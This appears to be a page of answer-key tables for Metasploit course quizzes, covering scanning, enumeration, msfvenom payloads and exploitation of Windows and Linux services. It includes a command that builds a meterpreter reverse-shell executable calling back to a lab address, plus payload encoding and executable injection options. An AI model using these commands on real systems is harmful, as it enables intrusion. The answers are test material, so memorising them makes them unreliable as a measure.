The Metasploit Framework (MSF)
🚩 CTFs & Labs 🧪¶
❔ Quizzes¶
Windows¶
Introduction to the Metasploit Framework¶
Question | Answer |
---|---|
The Metasploit Framework is open source and the codebase is publicly available on GitHub. | True |
What year was Metasploit officially released to the public? | 2003 |
Metasploit Framework Architecture¶
Question | Answer |
---|---|
What programming language is used to develop MSF modules? | Ruby |
Encoders are used to encode payloads with the aim of evading signature based AVs. | True |
What directory is the Metasploit Framework installed in by default on Kali Linux? | /usr/share/metasploit-framework |
Penetration Testing With The Metasploit Framework¶
Question | Answer |
---|---|
What type of MSF modules are used to perform functionality associated with information gathering? | Auxiliary Modules |
Installing & Configuring The Metasploit Framework¶
Question | Answer |
---|---|
Which one of the following commands can be used to setup and initialize the Metasploit Framework database? | sudo msfdb init |
MSFconsole Fundamentals¶
Question | Answer |
---|---|
Which one of the following MSFconsole commands can be used to set the global variable value for the RHOSTS option? | setg RHOSTS 10.10.10.20 |
What MSFconsole search query can be used to limit the results to only display modules compatible with Windows? | search type:exploit platform:windows |
Creating & Managing Workspaces¶
Question | Answer |
---|---|
Which one of the following MSFconsole commands can be used to rename an existing workspace? | workspace -r |
Port Scanning & Enumeration With Nmap¶
Question | Answer |
---|---|
Which one of the following Nmap scans can be used to output scan results in to XML? | nmap -sV -O 10.10.10.1 -oX output |
Importing Nmap Scan Results Into MSF¶
Question | Answer |
---|---|
Which one of the following MSFconsole commands can be used to import external Nmap scan results in to the Metasploit Framework database? | db_import |
Port Scanning With Auxiliary Modules¶
Question | Answer |
---|---|
Which one of the following MSF auxiliary modules can be used to perform a TCP port scan? | auxiliary/scanner/portscan/tcp |
FTP Enumeration¶
Question | Answer |
---|---|
What is the default FTP port? | 21 |
SMB Enumeration¶
Question | Answer |
---|---|
What SMB auxiliary module can be used to enumerate the SMB version? | auxiliary/scanner/smb/smb_version |
Web Server Enumeration¶
Question | Answer |
---|---|
What HTTP auxiliary module can be used to perform file brute-force attacks on a web server? | auxiliary/scanner/http/files_dir |
MySQL Enumeration¶
Question | Answer |
---|---|
What MySQL auxiliary module can be used to execute authenticated SQL queries on a MySQL database server? | auxiliary/admin/mysql/mysql_sql |
SSH Enumeration¶
Question | Answer |
---|---|
SSH can be configured to run on any open TCP Port. | True |
SMTP Enumeration¶
Question | Answer |
---|---|
What SMTP auxiliary module can be used to enumerate the version of SMTP running on a target? | auxiliary/scanner/smtp/smtp_version |
Vulnerability Scanning With MSF¶
Question | Answer |
---|---|
Which one of the following MSFconsole commands is used to load a custom plugin? | load db_autopwn |
Vulnerability Scanning With Nessus¶
Question | Answer |
---|---|
Which one of the following MSFconsole search queries can be used to search for specific CVE's released in a specific year? | |
search cve:2017 platform:windows | |
Which one of the following MSFconsole commands can be used to display the vulnerability information within the Metasploit Framework database? | vulns |
Web App Vulnerability Scanning With WMAP¶
Question | Answer |
---|---|
Which one of the following MSFconsole commands can be used to create a new target with WMAP? | wmap_targets -t |
Generating Payloads With Msfvenom¶
Question | Answer |
---|---|
Which one of the following Msfvenom commands can be used to generate an x64 Windows meterpreter payload? | msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=1234 -f exe > payload.exe |
Msfvenom can be used to encode payloads | True |
Encoding Payloads With Msfvenom¶
Question | Answer |
---|---|
Which of the following Msfvenom options can be used to increase the number of encoding iterations? (Choose two) | --iterations 10, -i 10 |
Injecting Payloads Into Windows Portable Executables¶
Question | Answer |
---|---|
Which one of the following Msfvenom options can be used to specify a custom executable file for injection? | -x executable.exe |
Automating Metasploit With Resource Scripts¶
Question | Answer |
---|---|
Which one of the following Msfconsole commands can be used to load a resource script? | resource ~/Desktop/handler.rc |
Exploiting A Vulnerable HTTP File Server¶
Question | Answer |
---|---|
An HTTP file server can be used to host a web application? | False |
Exploiting Windows MS17-010 SMB Vulnerability¶
Question | Answer |
---|---|
What version of SMB is vulnerable to the EternalBlue exploit? | SMBv1 |
Exploiting WinRM (Windows Remote Management Protocol)¶
Question | Answer |
---|---|
What is the default HTTPS WinRM port? | 5986 |
Exploiting A Vulnerable Apache Tomcat Web Server¶
Question | Answer |
---|---|
Apache Tomcat can be used to host web applications developed in Java? | True |
What is the default port used by Apache Tomcat? | 8080 |
Linux¶
Exploiting A Vulnerable FTP Server¶
Question | Answer |
---|---|
What version of VSFTPD is vulnerable to backdoor command execution? | V2.3.4 |
Exploiting Samba¶
Question | Answer |
---|---|
Samba is the Linux implementation of SMB? | True |
Exploiting A Vulnerable SSH Server¶
Question | Answer |
---|---|
The "auxiliary/scanner/ssh/libssh_auth_bypass" module can be used to spawn a TTY session on the target system, which of the following module options can be used to spawn a TTY session after running the module? | set SPAWN_PTY true |
Which one of the following Nmap scans can be used to enumerate the version of SSH running on a target? | nmap -sS -sV -p 22 10.10.10.1 |
Exploiting A Vulnerable SMTP Server¶
Question | Answer |
---|---|
Haraka SMTP versions prior to V2.8.9 are vulnerable to command injection. | True |
Which one of the following MSFconsole search queries can be used to search for Haraka SMTP exploit modules? | search type:exploit name:haraka |